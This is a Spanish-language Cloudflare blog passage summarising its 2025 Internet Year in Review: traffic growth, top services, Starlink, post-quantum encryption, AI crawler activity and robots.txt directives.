En esta publicación, destacamos conclusiones clave y observaciones interesantes de las principales secciones del micrositio "Resumen del año" y hemos vuelto a publicar una entrada complementaria en el blog "Servicios de Internet más populares" que analiza específicamente las tendencias observadas en los principales servicios de Internet.

Te animamos a visitar el micrositio Resumen del año 2025 para explorar los conjuntos de datos y las métricas con más detalle, incluidos los de tu país / región, para ver cómo han cambiado desde 2024 y cómo se comparan con otras áreas de interés.

Esperamos que el informe te resulte una herramienta útil y enriquecedora para descubrir los cambios, los avances y las métricas que han definido Internet en 2025. 

Empecemos.

• El tráfico global de Internet creció un 19 % en 2025, y el crecimiento más significativo se produjo a partir de agosto. ➜

• Los 10 servicios de Internet más populares experimentaron algunos cambios con respecto al año anterior, y hubo nuevas incorporaciones a algunas listas de categorías. ➜

• El tráfico de Starlink se duplicó en 2025, incluido el tráfico de más de 20 países / regiones nuevos. ➜

• Googlebot volvió a ser responsable del mayor volumen de tráfico de solicitudes a Cloudflare en 2025, ya que rastreó millones de sitios de clientes de Cloudflare para la indexación de búsquedas y el entrenamiento de la IA. ➜

• La proporción del tráfico web generado por humanos que está cifrado con tecnología poscuántica ha aumentado hasta el 52 %. ➜

• Googlebot fue responsable de más de una cuarta parte del tráfico de bots verificados. ➜

• El volumen de rastreo del Googlebot de doble función eclipsó al de otros bots y rastreadores de IA. ➜

• El rastreo de "acciones de usuarios" por parte de la IA se multiplicó por más de 15 en 2025. ➜

• Mientras que otros bots de IA representaron el 4,2 % del tráfico de solicitudes HTML, Googlebot por sí solo representó el 4,5 %. ➜

• Anthropic tuvo la proporción más alta de rastreo-referencia entre las principales plataformas de IA y búsqueda. ➜

• Los rastreadores de IA fueron los agentes de usuario a los que se les denegó totalmente el acceso con más frecuencia en los archivos robots.txt. ➜

• En Workers AI, el modelo llama-3-8b-instruct de Meta fue el más popular, y la generación de texto fue el tipo de tarea más frecuente. ➜

• Los dispositivos iOS generaron el 35 % del tráfico de dispositivos móviles a nivel mundial y más de la mitad del tráfico de dispositivos en muchos países. ➜

• El porcentaje de las solicitudes web globales que utilizan HTTP/3 y HTTP/2 aumentó ligeramente en 2025. ➜

• Las bibliotecas y los marcos basados en JavaScript siguieron siendo herramientas fundamentales para la creación de sitios web. ➜

• Una quinta parte de las solicitudes de API automatizadas fueron realizadas por clientes de Go. ➜

• Google sigue siendo el motor de búsqueda líder, seguido de lejos por Yandex, Bing y DuckDuckGo. ➜

• Chrome sigue siendo el navegador principal en todas las plataformas y sistemas operativos, excepto en iOS, donde Safari tiene la mayor cuota. ➜

• Casi la mitad de las 174 interrupciones importantes de Internet observadas en todo el mundo en 2025 se debieron a cortes regionales y nacionales de la conectividad a Internet impuestos por los gobiernos. ➜

• A nivel mundial, menos de un tercio de las solicitudes de doble pila se realizaron a través de IPv6, mientras que en la India, más de dos tercios lo hicieron. ➜

• Los países europeos registraron algunas de las velocidades de descarga más altas, todas superiores a 200 MB/s. España estuvo sistemáticamente entre los primeros en cuanto a métricas de calidad de Internet. ➜

• Londres y Los Ángeles fueron los puntos más activos en las pruebas de velocidad de Cloudflare en 2025. ➜

• Más de la mitad del tráfico de solicitudes procede de dispositivos móviles en 117 países / regiones. ➜

• El 6 % del tráfico global a través de la red de Cloudflare fue mitigado por nuestros sistemas, ya sea como potencialmente malicioso o por razones definidas por el cliente. ➜

• El 40 % del tráfico global de bots procedió de Estados Unidos. Amazon Web Services y Google Cloud generaron una cuarta parte del tráfico global de bots. ➜

• Las organizaciones del sector "Personas y sociedad" fueron las más afectadas durante 2025. ➜

• La seguridad del enrutamiento, medida como la proporción de rutas válidas RPKI y el espacio de direcciones IP cubierto, experimentó una mejora continua a lo largo de 2025. ➜

• El tamaño de los ataques DDoS hipervolumétricos aumentó significativamente a lo largo del año. ➜

• Más del 5 % de los mensajes de correo electrónico analizados por Cloudflare resultaron ser maliciosos. ➜

• Los enlaces engañosos, el robo de identidad y la suplantación de marcas fueron los tipos de amenazas más comunes encontrados en los mensajes de correo electrónico maliciosos. ➜

• Casi todos los mensajes de correo electrónico procedentes de los dominios de nivel superior .christmas y .lol resultaron ser spam o maliciosos. ➜

Para determinar las tendencias de tráfico a lo largo del tiempo en este informe, utilizamos como referencia el volumen medio diario de tráfico (sin incluir el tráfico de bots) durante la segunda semana completa del calendario (del 12 al 18 de enero) de 2025. (Se toma como referencia la segunda semana para dar tiempo a que las personas vuelvan a sus rutinas escolares y laborales "habituales" después de las vacaciones de invierno y el día de Año Nuevo). El cambio porcentual que se muestra en el gráfico de tendencias de tráfico se calcula teniendo en cuenta el valor de referencia, no representa el volumen de tráfico absoluto de un país o región. La línea de tendencia representa un promedio de seguimiento de siete días que se utiliza para mitigar los cambios bruscos que se observan con los datos diarios en detalle. 

El crecimiento del tráfico en 2025 pareció producirse en varias fases. El tráfico se mantuvo, de media, relativamente estable hasta mediados de abril, situándose en general en un margen de un par de puntos porcentuales con respecto al valor de referencia. Sin embargo, a partir de entonces experimentó un crecimiento hasta alcanzar aproximadamente un 5 % por encima del valor de referencia en mayo, manteniéndose en un rango del +4-7 % hasta mediados de agosto. Fue entonces cuando el crecimiento se aceleró, aumentando de forma constante durante septiembre, octubre y noviembre, hasta alcanzar un máximo del 19 % en el conjunto del año. Gracias al aumento de finales de noviembre, la tasa de crecimiento de 2025 es aproximadamente un 10 % superior al crecimiento del 17 % observado en 2024. En los últimos años, también hemos observado una aceleración del crecimiento del tráfico en la segunda mitad del año. No obstante, en 2022-2024, esa aceleración comenzó en julio. No está claro por qué el crecimiento de este año se retrasó aparentemente varias semanas.

^{Tendencias del tráfico de Internet en 2025, a nivel mundial}

Botsuana registró el mayor pico de crecimiento, llegando a superar en un 298 % el nivel de referencia el 8 de noviembre y finalizando el periodo un 295 % por encima del nivel de referencia. (Más información sobre lo que explica ese crecimiento en la sección de Starlink a continuación). Botsuana y Sudán fueron los únicos países o regiones que vieron cómo el tráfico se duplicaba con creces a lo largo del año, aunque algunos otros experimentaron aumentos máximos superiores al 100 % en algún momento del año.

^{Tendencias del tráfico de Internet en 2025 | Botsuana}

El impacto de las interrupciones prolongadas de Internet también se aprecia claramente en los gráficos. Por ejemplo, el 29 de octubre, el Gobierno tanzano impuso un bloqueo de Internet en respuesta a las protestas del día de las elecciones. Ese cierre duró solo un día, pero hubo otro desde el 30 de octubre hasta el 3 de noviembre. Aunque el tráfico en el país había aumentado más de un 40 % por encima del valor de referencia antes de los cierres, la interrupción acabó reduciendo el tráfico más de un 70 % por debajo del nivel de referencia, lo que supuso un rápido cambio de tendencia. El tráfico se recuperó rápidamente tras restablecerse la conectividad. Se observó un patrón similar en Jamaica, donde el tráfico de Internet se disparó antes de la llegada del huracán Melissa el 28 de octubre, y luego disminuyó significativamente después de que la tormenta causara cortes de energía y daños a la infraestructura en la isla. El tráfico comenzó a recuperarse tras el paso de la tormenta y, a principios de diciembre, volvió a situarse ligeramente por encima del nivel de referencia.

^{Tendencias del tráfico de Internet en 2025 | Tanzania}

^{Tendencias del tráfico de Internet en 2025 | Jamaica}

En este informe, analizamos el periodo de 11 meses transcurridos hasta la fecha. Además de una lista clasificada "general", también clasificamos los servicios en nueve categorías, basándonos en el análisis de datos de consultas anonimizadas de tráfico a nuestro solucionador de DNS público 1.1.1.1 de millones de usuarios de todo el mundo. Para estas clasificaciones, se agrupan los dominios que pertenecen a un único servicio de Internet.

Google y Facebook volvieron a ocupar los dos primeros puestos entre los 10 primeros. Aunque los demás miembros de la lista de los 10 primeros se mantuvieron igual que en la clasificación de 2024, hubo algunos cambios en la parte media. Microsoft, Instagram y YouTube escalaron posiciones, Amazon Web Services (AWS) bajó un puesto, mientras que TikTok cayó cuatro puestos.

^{Principales servicios de Internet en 2025, a nivel mundial}

Entre los servicios de IA generativa, ChatGPT / OpenAI se mantuvo a la cabeza de la lista. Sin embargo, hubo cambios en otros servicios, lo que destaca la naturaleza dinámica de la industria. Entre los servicios que han mejorado su posición en la clasificación se encuentran Perplexity, Claude / Anthropic y GitHub Copilot. Entre las nuevas incorporaciones al ranking de los 10 principales servicios de 2025 se encuentran Google Gemini, Windsurf AI, Grok/xAI y DeepSeek.

^{Principales servicios de IA generativa en 2025, a nivel mundial}

Otras categorías también experimentaron cambios en sus listas: Shopee ("la plataforma líder de comercio electrónico y compras en línea en el sureste asiático y Taiwán") es una nueva incorporación a la lista de comercio electrónico, y HBO Max se ha unido a la clasificación de streaming de vídeo. Estas clasificaciones en categorías, y las tendencias observadas por servicios específicos, se analizan en más detalle en otra publicación del blog.

Además, este año también ofrecemos información detallada sobre los principales servicios de Internet a nivel de país / región para las categorías "General", "IA generativa", "Redes sociales" y "Mensajería". (En 2024, solo compartimos información general).

El servicio de Internet por satélite de SpaceX Starlink sigue siendo una opción popular para llevar conectividad a zonas sin servicio o con servicio deficiente, así como a usuarios en aviones y barcos. Analizamos los volúmenes de tráfico conjunto de Cloudflare relacionados con el sistema autónomo principal de Starlink (AS14593) para realizar un seguimiento del crecimiento en el uso del servicio a lo largo de 2025. El volumen de solicitudes que se muestra en la línea de tendencia del gráfico representa el promedio de los últimos siete días. 

A nivel mundial, el tráfico de Starlink siguió experimentando un crecimiento constante a lo largo de 2025, y el volumen total de solicitudes se multiplicó por 2,3 a lo largo del año. Tendemos a observar un rápido crecimiento del tráfico cuando el servicio Starlink está disponible en un país o región, y esta tendencia continúa en 2025. 

^{Crecimiento del tráfico de Starlink en 2025, a nivel mundial}

Eso es exactamente lo que vimos en los más de 20 países / regiones nuevos donde @Starlink anunció su disponibilidad. En cuestión de días, el tráfico de Starlink en esos lugares aumentó rápidamente. Entre ellos se encontraban Armenia, Níger, Sri Lanka y San Martín.

También observamos tráfico de Starlink desde varias ubicaciones que actualmente no están marcadas como disponibles para el servicio. Sin embargo, hay prefijos IPv4 y/o IPv6 asociados a estos países en la geofeed publicada por Starlink. Dada la posibilidad de que los usuarios de Starlink puedan utilizar su servicio (y su equipo) en itinerancia, es probable que este tráfico provenga de usuarios en itinerancia en esas zonas.

^{Crecimiento del tráfico de Starlink en 2025 | Níger}

De los países / regiones en los que el servicio estaba activo antes de 2025, Benín, Timor Oriental y Botsuana registraron algunos de los mayores crecimientos de tráfico, con un aumento de 51, 19 y 16 veces, respectivamente. La disponibilidad del servicio Starlink en Benín se anunció por primera vez en noviembre de 2023, en Timor Oriental en diciembre de 2024, y en Botsuana en agosto de 2024.

^{Crecimiento del tráfico de Starlink en 2025 | Botsuana}

Servicios similares, como Amazon Leo, Eutelsat Konnect y Qianfan de China, continúan ampliando sus constelaciones de satélites y avanzando hacia su disponibilidad comercial. Esperamos revisar el crecimiento del tráfico en estos servicios también en el futuro.

Para observar el tráfico total de solicitudes que Cloudflare registró en 2025 desde toda la red de Internet IPv4, podemos utilizar una curva de Hilbert, que nos permite visualizar una secuencia de direcciones IPv4 en un patrón bidimensional que mantiene las direcciones IP cercanas entre sí, lo que resulta útil para estudiar el espacio de direcciones IPv4 de Internet. En la visualización, agregamos las direcciones IPv4 en prefijos /20, lo que significa que en el nivel de ampliación más alto, cada cuadrado representa el tráfico de 4096 direcciones IPv4. Este nivel de agregación mantiene la cantidad de datos utilizados para la visualización en un nivel manejable. Consulta la publicación del blog "Resumen del año 2024" para obtener más información sobre la visualización.

Por tercer año consecutivo, el bloque de direcciones IP que tuvo el máximo volumen de solicitudes a Cloudflare durante 2025 fue el 66.249.64.0/20 de Google, uno de varios utilizados por el rastreador web Googlebot para recuperar contenido para la indexación de búsqueda y el entrenamiento de la IA. No es de extrañar que un bloque de direcciones IP de Googlebot se haya clasificado de nuevo como la principal fuente de tráfico de solicitudes, dado el número de propiedades web en la red de Cloudflare y la agresiva actividad de rastreo de Googlebot. El prefijo Googlebot representó casi cuatro veces más tráfico de solicitudes IPv4 que la siguiente fuente de tráfico más importante, 146.20.240.0/20, que forma parte de un bloque más grande de espacio de direcciones IPv4 anunciado por Rackspace Hosting. Como proveedor de nube y alojamiento, Rackspace admite muchos tipos diferentes de clientes y aplicaciones, por lo que se desconoce el origen del tráfico observado hacia Cloudflare.

^{Vista ampliada de la curva de Hilbert que muestra el bloque de direcciones que generó el mayor volumen de solicitudes en 2025}

Este año, hemos añadido la capacidad de buscar un sistema autónomo (ASN) a la visualización, lo que le permite ver con qué amplitud se distribuyen las existencias de direcciones IP de un proveedor de red en el universo IPv4. 

Un ejemplo es AS16509 (AMAZON-02, utilizado con AWS), que muestra los resultados de las adquisiciones de grandes cantidades de espacio de direcciones IPv4 por parte de Amazon a lo largo de los años. Otro ejemplo es AS7018 (ATT-INTERNET4, AT&T), que es uno de los mayores anunciadores de espacio de direcciones IPv4 en Estados Unidos. Gran parte del tráfico que vemos de este ASN procede de 12.0.0.0/8, un bloque de más de 16 millones de direcciones IPv4 que es propiedad de AT&T desde 1983.

^{Curva de Hilbert que muestra los bloques de direcciones IPv4 del AS7018 que enviaron tráfico a Cloudflare en 2025}

El término "poscuántico" hace referencia a un conjunto de técnicas criptográficas diseñadas para proteger los datos cifrados de los ataques "harvest now, decrypt later" (recopilar ahora, desencriptar más tarde) por parte de ciberdelincuentes que tienen la capacidad de capturar y almacenar datos actuales para su posterior descifrado mediante ordenadores cuánticos suficientemente avanzados. El equipo de investigación de Cloudflare lleva trabajando en criptografía poscuántica desde 2017 y publica periódicamente actualizaciones sobre el estado de la red de Internet poscuántica.

Tras experimentar un crecimiento significativo en 2024, la proporción global de tráfico encriptado poscuántico casi se duplicó a lo largo de 2025, pasando del 29 % a principios de año al 52 % a principios de diciembre. 

^{Crecimiento del tráfico TLS 1.3 encriptado poscuántico en 2025, a nivel mundial}

Veintiocho países / regiones vieron cómo su porcentaje de tráfico encriptado poscuántico se duplicaba con creces a lo largo del año, incluido un crecimiento significativo en Puerto Rico y Kuwait. La proporción de Kuwait casi se triplicó, pasando del 13 % al 37 %, y la de Puerto Rico creció del 20 % al 49 %. 

Esos tres fueron algunos de los que experimentaron un crecimiento significativo de su cuota a mediados de septiembre, coincidiendo con el lanzamiento por parte de Apple de actualizaciones del sistema operativo, en las que las "conexiones protegidas por TLS anunciarán automáticamente la compatibilidad con el intercambio híbrido de claves cuánticas seguras en TLS 1.3". En Kuwait y Puerto Rico, más de la mitad del tráfico de solicitudes proviene de dispositivos móviles, y aproximadamente la mitad proviene de dispositivos iOS en ambos lugares. Por lo tanto, no es sorprendente que esta actualización de software resultara en un aumento significativo del tráfico poscuántico.

^{Crecimiento del tráfico TLS 1.3 encriptado postcuántico en 2025 | Puerto Rico}

Con ese fin, la proporción de tráfico cifrado postcuántico de los dispositivos Apple iOS aumentó significativamente en septiembre tras el lanzamiento oficial de iOS 26. Solo cuatro días después del lanzamiento, la cuota global de solicitudes con soporte poscuántico de dispositivos iOS aumentó de poco menos del 2 % al 11 %. A principios de diciembre, más del 25 % de las solicitudes de dispositivos iOS utilizaban encriptación poscuántica.

El nuevo directorio de bots en Cloudflare Radar proporciona una gran cantidad de información sobre bots verificados y agentes firmados, incluidos sus operadores, categorías y agentes de usuario asociados, enlaces a documentación y tendencias de tráfico. Los bots verificados deben cumplir una serie de requisitos, además de ser verificados mediante Web Bot Auth o la validación de dirección IP. Un agente firmado está controlado por un usuario final y un agente de firma verificado desde su implementación de Web Bot Auth, y debe cumplir con un conjunto independiente de requisitos.

Googlebot se utiliza para rastrear el contenido del sitio web para la indexación de búsqueda y el entrenamiento de la IA, y fue, de lejos, el bot más activo observado por Cloudflare durante todo 2025. Estuvo más activo entre mediados de febrero y mediados de julio, alcanzando su punto máximo a mediados de abril, y fue responsable de más del 28 % del tráfico de bots verificados. Otros bots operados por Google que fueron responsables de cantidades notables de tráfico incluían Google AdsBot (utilizado para supervisar los sitios web donde se muestran anuncios de Google), Google Image Proxy (utilizado para recuperar y almacenar en caché images incrustadas en mensajes de correo electrónico) y GoogleOther (utilizado por varios equipos de producto para obtener contenido accesible públicamente de los sitios).

El GPTBot de OpenAI, que rastrea contenido para el entrenamiento de la IA, fue el siguiente bot más activo, de hecho originó aproximadamente el 7,5 % del tráfico de bots verificados, con una actividad de rastreo bastante volátil durante la primera mitad del año. Bingbot de Microsoft rastrea el contenido de sitios web para indexación de búsquedas y entrenamiento de la IA, y generó el 6 % del tráfico de bots verificados a lo largo del año, lo que muestra una actividad relativamente estable. 

^{Tendencias del tráfico de bots verificados en 2025, a nivel mundial}

Los rastreadores de motores de búsqueda y los rastreadores de IA son las dos categorías de bots verificados más activas, con patrones de tráfico que se corresponden estrechamente con los principales bots de esas categorías, incluidos GoogleBot y GPTBot de OpenAI. Los rastreadores de motores de búsqueda fueron responsables del 40 % del tráfico de bots verificados, y los rastreadores de IA generaron la mitad (20 %). Los bots de optimización de motores de búsqueda también fueron bastante activos y generaron más del 13 % de las solicitudes de bots verificados.

^{Tendencias del tráfico de bots verificados por categoría en 2025, a nivel mundial}

En septiembre, una entrada del blog de Cloudflare presentó una propuesta de principios para el uso responsable de los bots con IA, uno de los cuales era "los bots con IA deben tener un propósito claro y declararlo". En la descripción general de las prácticas recomendadas para bots de IA en Radar, observamos que varios operadores de bots tienen rastreadores de doble propósito, incluidos Google y Microsoft.

Dado que Googlebot rastrea tanto para la indexación del motor de búsqueda como para el entrenamiento de la IA, lo hemos incluido en la descripción general de los rastreadores de IA de este año. En 2025, su volumen de rastreo superó al de otros bots de IA líderes. El tráfico de solicitudes comenzó a aumentar a mediados de febrero, alcanzando su punto máximo a finales de abril, y luego disminuyó lentamente hasta finales de julio. Después de eso, creció gradualmente hasta el final del año. Bingbot también tiene un doble propósito similar, aunque su volumen de rastreo es una pequeña parte del de Googlebot. La actividad de rastreo de Bingbot tuvo una tendencia generalmente al alza a lo largo del año.

^{Tendencias del tráfico de rastreadores de IA en 2025, a nivel mundial}

El GPTBot de OpenAI se utiliza para rastrear contenido que puede usarse en el entrenamiento de modelos básicos de IA generativa de OpenAI. Su actividad de rastreo fue bastante volátil durante el año, alcanzando sus niveles máximos en junio, pero terminó en noviembre ligeramente por encima de los niveles de rastreo observados a principios de año. 

El volumen de rastreo de ChatGPT-User de OpenAI, que visita páginas web cuando los usuarios hacen preguntas a ChatGPT o CustomGPT, experimentó un crecimiento sostenido a lo largo del año. Un patrón de uso semanal se hizo más evidente a partir de mediados de febrero, lo que sugiere un aumento del uso en los centros educativos y en el lugar de trabajo. Los volúmenes máximos de solicitudes fueron hasta 16 veces superiores a los de principios de año. También se hizo evidente un descenso en la actividad durante el periodo de junio a agosto, ya que muchos estudiantes estaban de vacaciones y numerosos profesionales se tomaron un descanso. 

OAI-SearchBot, que se utiliza para enlazar y mostrar sitios web en los resultados de búsqueda de las funciones de búsqueda de ChatGPT, experimentó un crecimiento gradual de la actividad de rastreo a lo largo del mes de agosto, seguido de varios picos de tráfico en agosto y septiembre, antes de comenzar a crecer de forma más acusada a principios de octubre, con un volumen máximo de solicitudes durante un pico a finales de octubre aproximadamente cinco veces superior al de principios de año.

^{Tendencias del tráfico del rastreador OpenAI en 2025, a nivel mundial}

El rastreo del ClaudeBot de Anthropic se duplicó de forma efectiva durante la primera mitad del año, pero disminuyó gradualmente durante la segunda mitad, volviendo a un nivel aproximadamente un 10 % superior al de principios de año. El tráfico de rastreo del PerplexityBot de Perplexity creció lentamente durante enero y febrero, pero experimentó un gran aumento en la actividad desde mediados de marzo hasta abril. Después de eso, el crecimiento fue más gradual hasta octubre, antes de experimentar un aumento significativo nuevamente en noviembre, terminando aproximadamente 3,5 veces por encima del nivel con el que había comenzado el año.

^{Tendencias de tráfico de ClaudeBot en 2025, a nivel mundial}

^{Tendencias de tráfico de PerplexityBot en 2025, a nivel mundial}

Bytespider de ByteDance, uno de los principales rastreadores de IA de 2024, experimentó un volumen de rastreo inferior al de otros bots de entrenamiento, y su actividad disminuyó a lo largo del año, continuando el descenso observado el año pasado.

La mayoría de los bots de IA rastrean con uno de estos tres fines: entrenamiento, que recopila contenido de sitios web para entrenar modelos de IA, búsqueda, que indexa contenido de sitios web para la funcionalidad de búsqueda disponible en plataformas de IA, y acción del usuario, que visita sitios web en respuesta a preguntas que los usuarios plantean a un bot de chat. Ten en cuenta que el rastreo de búsqueda también puede incluir el rastreo de generación aumentada por recuperación (RAG), que permite a un propietario de contenido incorporar sus propios datos en la generación de un modelo de lenguaje de gran tamaño sin volver a entrenar o ajustar un modelo. (Un cuarto propósito "no declarado" captura el tráfico de bots de IA cuyo propósito de rastreo no está claro o se desconoce).

El rastreo para el entrenamiento de modelos es responsable de la gran mayoría del tráfico de rastreadores de la IA, alcanzando hasta 7-8 veces el rastreo de búsquedas y 32 veces el rastreo de acciones de los usuarios en los momentos de mayor actividad. La cifra de tráfico de entrenamiento está muy influenciada por GPTBot de OpenAI y, por lo tanto, siguió un patrón muy similar durante el año.

El rastreo para búsqueda fue más intenso hasta mediados de marzo, momento en que disminuyó aproximadamente un 40 %. Después volvió a un crecimiento más gradual, aunque al final del periodo analizado se situó algo menos de un 10 % por debajo del nivel registrado a principios de año.

El rastreo de acciones de usuario comenzó en 2025 con el volumen de rastreo más bajo de los tres propósitos definidos, pero se duplicó con creces entre enero y febrero. Volvió a duplicarse a principios de marzo y, a partir de ahí, continuó creciendo durante todo el año, multiplicándose por más de 21 desde enero hasta principios de diciembre. Este crecimiento se correlaciona estrechamente con las tendencias de tráfico observadas para el bot ChatGPT-User de OpenAI.

^{Tendencias del tráfico de los rastreadores de acciones de los usuarios en 2025, a nivel mundial}

Los bots de IA han aparecido con frecuencia en las noticias durante 2025, a medida que los propietarios de contenido expresan su preocupación por la cantidad de tráfico que generan, especialmente porque gran parte de este no se traduce en que los usuarios finales sean redirigidos a los sitios web de origen. Para comprender mejor el impacto de la actividad de rastreo de los bots con IA, en comparación con los bots sin IA y el uso humano de la web, analizamos el tráfico de solicitudes de contenido HTML en toda la base de clientes de Cloudflare y lo clasificamos como procedente de un humano, un bot con IA u otro tipo de bot "sin IA". (Ten en cuenta que, dado que aquí nos centramos únicamente en el contenido HTML, las cuotas de tráfico del bot y de los usuarios humanos diferirán de las que se muestran en Radar, que analiza el tráfico de solicitudes para todos los tipos de contenido). Dado que Googlebot rastrea de forma tan activa y tiene un doble propósito, hemos desglosado su proporción por separado en este análisis.

A lo largo de 2025, descubrimos que el tráfico de bots de IA representó una media del 4,2 % de las solicitudes HTML. El porcentaje varió considerablemente a lo largo del año, disminuyendo hasta el 2,4 % a principios de abril y aumentando hasta el 6,4 % a finales de junio.

Con ese fin, los bots no basados en IA comenzaron 2025 siendo responsables de la mitad de las solicitudes a páginas HTML, siete puntos porcentuales por encima del tráfico generado por humanos. Esta diferencia aumentó hasta 25 puntos porcentuales durante los primeros días de junio. Sin embargo, estas cuotas de tráfico comenzaron a acercarse a partir de mediados de junio y, a partir del 11 de septiembre, entraron en un periodo en el que la cuota de tráfico HTML generada por humanos superó en ocasiones a la de los bots no basados en IA. A partir del 2 de diciembre, el tráfico humano generó el 47 % de las solicitudes HTML, y los bots que no son de IA generaron el 44 %.

Googlebot es un rastreador particularmente voraz y este año originó el 4,5 % de las solicitudes HTML, un porcentaje ligeramente superior al de los bots de IA en conjunto. Comenzó el año con algo menos del 2,5 %, pero su cuota aumentó rápidamente durante los siguientes cuatro meses, alcanzando un máximo del 11 % a finales de abril. Posteriormente, retrocedió hacia su punto de partida durante los meses siguientes y, a continuación, volvió a crecer durante la segunda mitad del año, finalizando con una cuota del 5 %. Este cambio en la cuota refleja en gran medida la actividad de rastreo de Googlebot, como se ha comentado anteriormente.

^{Cuota de tráfico HTML por tipo de bot en 2025, a nivel mundial}

Lanzamos la métrica de relación rastreo-referencia en Radar el 1 de julio para rastrear la frecuencia con la que una determinada plataforma de IA o de búsqueda envía tráfico a un sitio en relación con la frecuencia con la que rastrea ese sitio. Una ratio alta significa que hay una gran cantidad de rastreo de IA sin enviar personas reales a un sitio web.

Puede ser una métrica volátil, con valores que varían día a día a medida que cambian la actividad de rastreo y el tráfico de referencia. Esta métrica compara el número total de solicitudes de agentes de usuario relevantes asociados a una plataforma de búsqueda o de IA determinada donde la respuesta fue de Content-type: text/html por el número total de solicitudes de contenido HTML en las que el encabezado Referer contenía un nombre de host asociado a una plataforma de búsqueda o de IA determinada. 

Anthropic tuvo las ratios de rastreo-referencia más altas de este año, alcanzando hasta 500 000:1, aunque fueron bastante irregulares entre enero y mayo. Tanto la magnitud como la naturaleza errática de la métrica se debieron probablemente al escaso tráfico de referencia durante ese periodo. Después de eso, las ratios se volvieron más consistentes, pero siguieron siendo más altas que otras, oscilando entre ~25 000:1 y ~100 000:1.

Las ratios de OpenAI a lo largo del tiempo fueron bastante irregulares y alcanzaron hasta 3700:1 en marzo. Estos cambios pueden deberse a la estabilidad de la actividad de rastreo de GPTBot, junto con un mayor uso de la funcionalidad de búsqueda de ChatGPT, que incluye enlaces a los sitios web de origen en sus respuestas. Los usuarios que sigan esos enlaces aumentarán los recuentos de referencia, lo que podría reducir la ratio. (Suponiendo que el tráfico de rastreo no aumentase a un ritmo similar o mayor).

Perplexity tuvo las ratios de rastreo-referencia más bajas de las principales plataformas de IA, comenzando el año por debajo de 100:1 antes de dispararse a finales de marzo por encima de 700:1, coincidiendo con un pico de tráfico de rastreo observado desde PerplexityBot. Tras el repunte, los valores máximos de la ratio se estabilizaron por debajo de 400:1 y, a partir de septiembre, por debajo de 200:1.

Entre las plataformas de búsqueda, la ratio de Microsoft mostró inesperadamente un patrón semanal cíclico, alcanzando sus niveles más bajos los jueves y alcanzando su punto máximo los domingos. Los valores máximos de la ratio se situaron generalmente entre 50:1 y 70:1 a lo largo del año. Comenzando el año con poco más de 3:1, la ratio entre rastreos y referencias de Google aumentó de manera constante hasta abril, alcanzando un máximo de 30:1. Tras alcanzar su punto máximo, descendió de forma algo errática hasta mediados de julio, retrocediendo a 3:1, aunque ha ido aumentando lentamente durante la segunda mitad de 2025. La ratio de DuckDuckGo se mantuvo por debajo de 1:1 durante los tres primeros trimestres de 2025, pero experimentó un aumento repentino a 1,5:1 a mediados de octubre y se mantuvo elevada durante el resto del periodo.

^{Ratios de rastreo-referencia de la IA y las plataformas de búsqueda en 2025, a nivel mundial}

El archivo robots.txt, definido formalmente en el estándar RFC 9309 como el Protocolo de exclusión de robots, es un archivo de texto que los propietarios de contenido pueden utilizar para indicar a los rastreadores web a qué partes de un sitio web pueden acceder. Esto se realiza mediante directivas para permitir o denegar el acceso a los rastreadores de búsqueda y de IA a todo el sitio o solo a partes del mismo. Las directivas del archivo son, en efecto, una señal de "prohibido el paso" y no proporcionan ningún control de acceso formal. Dicho esto, la función robots.txt administrado de Cloudflare actualiza automáticamente el archivo robots.txt existente de un sitio o crea un archivo robots.txt en el sitio que incluye directivas que solicitan a los operadores de bots de IA más populares que no utilicen el contenido para el entrenamiento de modelos de IA. Además, nuestras funciones de AI Crawl Control pueden rastrear las infracciones de las directivas robots.txt de un sitio, y dar al propietario del sitio la capacidad de bloquear las solicitudes del agente de usuario infractor.

En Cloudflare Radar, proporcionamos información sobre la cantidad de archivos robots.txt que se encuentran entre nuestros 10 000 principales dominios, así como la disposición total o parcial de las directivas "allow" (permiso) y "disallow" (denegación) que se encuentran en los archivos para los agentes de usuario rastreadores seleccionados. (En este contexto, "total" se refiere a las directivas que se aplican a todo el sitio, y "parcial" se refiere a las directivas que se aplican a rutas o tipos de archivos específicos). En el micrositio del Resumen del año mostramos cómo cambió la disposición de estas directivas a lo largo de 2025.

Los agentes de usuario con el mayor número de directivas totalmente no permitidas son los asociados a los rastreadores de IA, incluidos GPTBot, ClaudeBot y CCBot. Las directivas para los rastreadores Googlebot y Bingbot, utilizados tanto para la indexación de búsquedas como para el entrenamiento de la IA, se orientaban principalmente a la denegación parcial, probablemente enfocadas en aislar los puntos finales de inicio de sesión y otras áreas no relacionadas con el contenido de un sitio. Para estos dos bots, las directivas aplicables a todo el sitio representaron una pequeña parte del número total de directivas de no permitir observadas durante el año. 

^{Directivas de no permitir de Robots.txt por agente de usuario}

El número de directivas explícitas "allow" encontradas en los archivos robots.txt descubiertos era una pequeña parte de las directivas "disallow" observadas, probablemente porque "allow" es la política predeterminada, en ausencia de cualquier directiva específica. Googlebot tenía el mayor número de directivas "allow" explícitas, aunque más de la mitad de ellas eran permisos parciales. Se encontraron directivas "allow" dirigidas a rastreadores de IA en menos dominios, y directivas dirigidas a los rastreadores de OpenAI que se inclinan más hacia permisos explícitos totales. 

Google-Extended es un token de agente de usuario que los editores web pueden utilizar para gestionar si el contenido que Google rastrea de sus sitios se puede utilizar para entrenar modelos Gemini o para proporcionar contenido del sitio desde el índice de Búsqueda de Google a Gemini. El número de directivas de permiso dirigidas a este token se triplicó durante el año. La mayoría permitía el acceso parcial a principios de año, mientras que a finales de año se observó un mayor número de directivas que permitían explícitamente el acceso total al sitio en comparación con aquellas que solo permitían el acceso a una parte del contenido del sitio. 

^{Directivas 'allow' de Robots.txt por agente de usuario}

El panorama de los modelos de IA está evolucionando rápidamente, y los proveedores lanzan periódicamente modelos más potentes, capaces de realizar tareas como la generación de texto e imágenes, el reconocimiento de voz y la clasificación de imágenes. Cloudflare trabaja estrechamente con los proveedores de modelos de IA para garantizar la compatibilidad de Workers AI con estos modelos lo antes posible tras su lanzamiento, y recientemente hemos adquirido Replicate para ampliar considerablemente nuestro catálogo de modelos compatibles. En febrero de 2025, incorporamos en Radar visibilidad sobre la popularidad de los modelos compatibles disponibles públicamente, así como los tipos de tareas que realizan estos modelos, en función del porcentaje de cuentas de los clientes. 

